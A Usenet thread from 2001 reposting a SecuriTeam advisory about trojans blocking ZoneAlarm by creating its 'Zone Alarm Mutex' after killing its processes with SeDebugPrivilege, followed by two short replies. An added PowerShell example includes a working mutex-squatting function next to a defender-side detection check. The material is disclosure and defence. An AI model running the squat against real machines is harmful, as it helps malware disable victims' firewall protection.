[NEWS] Trojans can block ZoneAlarm by setting a Mutex in memory


Cybernetics
Jan 13, 2001, 9:34:33 AM
The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com


Trojans can block ZoneAlarm by setting a Mutex in memory
------------------------------------------------------------------------


SUMMARY

ZoneAlarm and ZoneAlarm Pro can be stopped from loading by creating a
memory-resident Mutex (using a call to the CreateMutex API).
Uninstalling/reinstalling ZoneAlarm in a different path has no effect.
The impact of this vulnerability is that a Trojan running on a victim's
machine can prevent ZoneAlarm from loading, and thus leave the victim open
to attack.

DETAILS

Vulnerable systems:
All known versions of ZoneAlarm

Zone Labs (http://www.zonelabs.com) "ZoneAlarm" and "ZoneAlarm Pro"
programs both use a Mutex - an event synchronization memory object - to
determine whether they have already loaded (to prevent loading a second
instance of the firewall).

By design, ZoneAlarm/ZoneAlarm Pro has no way of determining which program
actually set the Mutex, thus allowing a Trojan to use the Mutex and block
both ZoneAlarm and ZoneAlarm Pro from loading.

Exploit:
A Trojan can easily set this Mutex ("Zone Alarm Mutex") with one simple
call to the CreateMutex API (see http://msdn.microsoft.com for more
information on Mutexes). ZoneAlarm and ZoneAlarm Pro are then prevented
from loading as long as the Trojan is alive. If ZoneAlarm is running, all
the Trojan has to do is terminate the processes zonealarm.exe, vsmon.exe
and minilog.exe first, before creating the Mutex. Despite being services,
vsmon.exe and minilog.exe can both be killed by any program by enabling
SeDebugPrivilege in its local process token, giving it the power to kill
any process/service.

Demonstration:
A harmless, simple, working executable to demonstrate the vulnerability
is available at:
http://www.diamondcs.com.au/alerts/zonemutx.exe (16kb).
While the demo program is running, you will not be able to load ZoneAlarm
or ZoneAlarm Pro, and if it finds that ZoneAlarm/ZoneAlarm Pro is running,
it will terminate the ZoneAlarm processes and services first using
SeDebugPrivilege before stealing the ZoneAlarm Mutex. The demo also opens
an echo server socket listening on TCP 7, allowing you to test socket
connectivity/data transfer (try telnetting to 127.0.0.1 on port 7 and
saying hello).

Workaround:
Apply the following unofficial patch:
http://www.diamondcs.com.au/alerts/zamutex.exe
Note: This patch is not an official patch from Zone Labs.

This patch re-hashes the Zone Alarm Mutex in both ZoneAlarm and ZoneAlarm
Pro. It is a temporary "band-aid" patch, and as such it is not bulletproof
and it is possible that it could be undone. However, it still greatly
improves the local security of ZoneAlarm regarding this situation - its
Mutex (as demonstrated by zonemutx.exe) can no longer be conventionally
hijacked. Zone Labs can only implement the real solution to this problem.

To apply the patch:
Download and run zamutex.exe (and needless to say, make sure you properly
shut down ZoneAlarm before running the patch) - it will ask you where the
ZoneAlarm.exe/ZAPro.exe file you want to patch is located. Select the
file, press OK and the program will do the rest by safely patching that
file and its accompanying zoneband.dll file.

As with all patches, it is recommended that you make a backup of the files
(zoneband.dll and zonealarm.exe/zapro.exe) before applying the patch.


ADDITIONAL INFORMATION

The information has been provided by Wayne of DiamondCS
(wa...@DIAMONDCS.COM.AU).

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
In order to subscribe to the mailing list, simply forward this email to:
list-su...@securiteam.com


====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.

--

Regards,
Cybernetics

Happy New Year.
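
An added example (illustrative PowerShell written for this page; it is not
DiamondCS's zonemutx.exe or zamutex.exe and not Zone Labs code). It shows
the two sides of the advisory above: the squat itself, which is nothing more
than holding a handle to a mutex named 'Zone Alarm Mutex', and the check a
responder can run to spot it, since a named mutex that exists while none of
the processes that legitimately create it are running is the one signal the
firewall's own CreateMutex call cannot see (it only learns
ERROR_ALREADY_EXISTS). The mutex name and the process names zonealarm,
zapro, vsmon and minilog are taken from the advisory; the function names,
verdict strings and the SeDebugPrivilege probe are this example's own
assumptions.

```powershell
# Added example, not the advisory's demo code and not Zone Labs code.
# Assumed from the advisory: mutex name 'Zone Alarm Mutex' and the process
# names zonealarm / zapro / vsmon / minilog. Everything else is illustrative.

function Start-MutexSquat {
    # Pre-create the named mutex the firewall tests for and keep holding it.
    # While the returned handle stays alive, any later CreateMutex() on the
    # same name gets ERROR_ALREADY_EXISTS, which is all the advisory's trick needs.
    param([string]$Name = 'Zone Alarm Mutex')

    $createdNew = $false
    $mutex = [System.Threading.Mutex]::new($false, $Name, [ref]$createdNew)
    [pscustomobject]@{
        Name       = $Name
        CreatedNew = $createdNew   # $false: a real instance (or another squatter) already holds it
        Handle     = $mutex        # keep a reference; Dispose() ends the squat
    }
}

function Test-SeDebugPrivilege {
    # The advisory's "kill the services first" step only works if the caller's
    # token carries SeDebugPrivilege (assigned to Administrators by default).
    # 'whoami /priv' lists it whether it is currently Enabled or Disabled.
    $privs = & whoami /priv 2>$null
    return [bool]($privs -match 'SeDebugPrivilege')
}

function Test-MutexSquat {
    # Defender-side check: mutex present + none of its owner processes running
    # is the squatting indicator. Probing with TryOpenExisting does not create
    # the object, so this check cannot itself block the firewall.
    param(
        [string]$Name = 'Zone Alarm Mutex',
        [string[]]$ProcessNames = @('zonealarm', 'zapro', 'vsmon', 'minilog')
    )

    $present = $false
    $handle  = $null
    try {
        $present = [System.Threading.Mutex]::TryOpenExisting($Name, [ref]$handle)
        if ($present) { $handle.Dispose() }   # only probing; do not hold it ourselves
    }
    catch [System.UnauthorizedAccessException] {
        # The object exists but its DACL denies us. A squatter can do this on
        # purpose so the victim's CreateMutex fails with ERROR_ACCESS_DENIED
        # instead of ERROR_ALREADY_EXISTS; either way the firewall does not start.
        $present = $true
    }

    $running = @(Get-Process -Name $ProcessNames -ErrorAction SilentlyContinue |
                 Select-Object -ExpandProperty ProcessName)

    $verdict = if ($present -and $running.Count -eq 0) {
        'mutex held but none of its owner processes are running: likely squatted'
    } elseif ($present) {
        'mutex held and an owner process is running'
    } elseif ($running.Count -gt 0) {
        'owner process running without its mutex: unexpected, investigate'
    } else {
        'mutex absent and owner not running'
    }

    [pscustomobject]@{
        Name           = $Name
        MutexPresent   = $present
        OwnerProcesses = $running
        Verdict        = $verdict
    }
}

# Usage (two PowerShell sessions on the same desktop):
#   $squat = Start-MutexSquat        # session A: hold 'Zone Alarm Mutex'
#   Test-MutexSquat | Format-List    # session B: MutexPresent True, Verdict 'likely squatted'
#   $squat.Handle.Dispose()          # session A: release; session B now reports 'mutex absent'
#   Test-SeDebugPrivilege            # True only for tokens that could follow the kill step
```

Two caveats when trying this on a current Windows build: an unprefixed mutex name
is created in the caller's session-local namespace, so to collide with an object a
service created you must use the 'Global\' prefix on both sides (the original
advisory predates this namespace split for most of its targets), and Get-Process
only sees other users' processes when run elevated, so run Test-MutexSquat from an
administrative session or the "owner not running" verdict can be a false positive.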


gizmo
Jan 13, 2001, 2:32:39 PM
I'm under the impression that ZA runs as a service, so the trojan
would also have to run as a service and additionally it would have to
start prior to ZA, is that correct?

KiwiBacon
Jan 15, 2001, 11:25:14 PM
The main point is that you need to be infected first. And if you are, then
why not destroy zone.exe instead...lol.

And as far as infection goes, it's nothing a good AV or AT can't sort
out.

--
"For Every Possible Action There's An Opposite An Equal Reaction"
